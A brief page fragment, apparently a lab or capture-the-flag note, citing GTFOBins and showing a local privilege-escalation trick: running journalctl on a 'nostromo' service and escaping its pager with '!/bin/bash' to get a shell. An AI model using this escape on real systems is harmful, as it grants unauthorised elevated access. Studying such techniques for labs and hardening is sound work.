Skip to content

GTFOBins 🔢

GTFOBins

This is a collection of binaries that can be used to bypass local security restrictions in misconfigured systems.

/usr/bin/journalctl -n5 -unostromo.service
!/bin/bash

Pay attention because kitty has trouble with the interactive shell.